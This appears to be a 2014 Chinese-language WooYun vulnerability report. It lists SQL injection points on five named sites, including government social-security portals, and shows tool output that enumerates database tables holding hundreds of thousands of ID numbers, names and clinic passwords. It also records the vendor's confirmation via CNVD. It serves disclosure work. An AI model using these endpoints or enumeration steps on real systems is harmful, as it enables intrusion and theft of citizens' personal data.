漏洞详情

披露状态:

2014-02-24: 细节已通知厂商并且等待厂商处理中
2014-03-01: 厂商已经确认,细节仅向厂商公开
2014-03-04: 细节向第三方安全合作伙伴开放
2014-03-11: 细节向核心白帽子及相关领域专家公开
2014-03-21: 细节向普通白帽子公开
2014-04-10: 细节向实习白帽子公开
2014-05-25: 细节向公众公开

简要描述:

多处SQL注入

详细说明:

技术支持:安徽科艾网络技术有限公司

漏洞站点:

http://www.hnldj.gov.cn/ 56W+的社保人员信息

http://www.hngwyj.gov.cn/

http://www.ccccah.cn/

http://www.yiyi-group.com/

http://www.xjjwhg.com/

... ...

注入点:

站点1

http://www.hnldj.gov.cn/new/zwgk.php?class_id=115

http://www.hnldj.gov.cn/new/ztzl.php?class_id=3396

http://www.hnldj.gov.cn/new/News_Text.php?id=3709&class_id=168

http://www.hnldj.gov.cn/new/ztzl_Text.php?class_id=3396&id=801

http://www.hnldj.gov.cn/red/ztzl.php?class_id=3396

http://www.hnldj.gov.cn/red/gdzl.php?style=3&lanmu=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EB%A1%A2%CA%A1%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD

http://www.hnldj.gov.cn/red/nmg.php?class_id=74

http://www.hnldj.gov.cn/red/zcgl.php?class_id=70

http://www.hnldj.gov.cn/red/ldjc.php?class_id=66

http://www.hnldj.gov.cn/red/zynl.php?class_id=62

http://www.hnldj.gov.cn/red/rlzy.php?class_id=34

http://www.hnldj.gov.cn/red/bszn.php?class_id=46

http://www.hnldj.gov.cn/red/jyzd.php?class_id=42

http://www.hnldj.gov.cn/red/zwgk.php?class_id=10

http://www.hnldj.gov.cn/red/shbx.php?class_id=38

http://www.hnldj.gov.cn/red/ztzl_text.php?id=799&class_id=3396

站点2

http://www.hngwyj.gov.cn/downfileclassify.php?classify=1

http://www.hngwyj.gov.cn/arccotent.php?id=1245

站点3

http://www.ccccah.cn/News_Text.php?id=95&class_id=112

http://www.ccccah.cn/gcyj.php?class_id=9

http://www.ccccah.cn/News_Text.php?class_id=13&id=699

站点4

http://www.yiyi-group.com/popbase.php?base_id=3356&id=18

http://www.yiyi-group.com/member_popbase.php?base_id=3245&id=43

http://www.yiyi-group.com/rlzy_popbase.php?id=47

http://www.yiyi-group.com/xmhz_popbase.php?base_id=3349&id=30

站点5

http://www.xjjwhg.com/model3.php?news_id=292

http://www.xjjwhg.com/model2.php?category_id=2&category_value=10

漏洞证明:

以站点1为例,泄露100W+的敏感信息:

当前数据库:

web server operating system: Windows 2008
web application technology: Microsoft IIS 7.5, ASP.NET
back-end DBMS: MySQL 5.0.11
current database: 'hnrllb'



数据库包含的表:

Database: hnrllb
[12 tables]
+-------------+
| admin |
| base |
| class |
| com_ledger |
| menzhen |
| message |
| per_account |
| per_ybzh |
| photo |
| temp |
| ypxx |
| ztzl |
+-------------+



看下per_account有哪些字段:

Table: per_account
[14 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| no | varchar(255) |
| AAE002 | varchar(255) |
| birth | varchar(255) |
| card_id | varchar(255) |
| GRZHBYJZ | varchar(255) |
| name | varchar(255) |
| sex | varchar(255) |
| YBBYSR | varchar(255) |
| YBBYZC | varchar(255) |
| YBLJCC | varchar(255) |
| YBLJJF | varchar(255) |
| YLGRJF | varchar(255) |
| YLLJCC | varchar(255) |
| YLLJYS | varchar(255) |
+----------+--------------+



per_account有60W+的信息:

Database: hnrllb
+-------------+---------+
| Table | Entries |
+-------------+---------+
| per_account | 606436 |
+-------------+---------+



再看看menzhen:

Table: menzhen
[9 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| card_id | varchar(20) |
| Community | varchar(100) |
| end_time | varchar(20) |
| hospital | varchar(100) |
| name | varchar(20) |
| num | varchar(20) |
| person_no | varchar(20) |
| psd | varchar(20) |
| start_time | varchar(20) |
+------------+--------------+



menzhen有name,psd等账户信息共56W+:

Database: hnrllb
+---------+---------+
| Table | Entries |
+---------+---------+
| menzhen | 563121 |
+---------+---------+



修复方案:

您懂!

版权声明:转载请注明来源 HackBraid@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-03-01 11:27

厂商回复:

CNVD确认并复现所述多个实例情况,已经转由CNCERT下发给安徽分中心处置。

最新状态:

暂无


漏洞评价: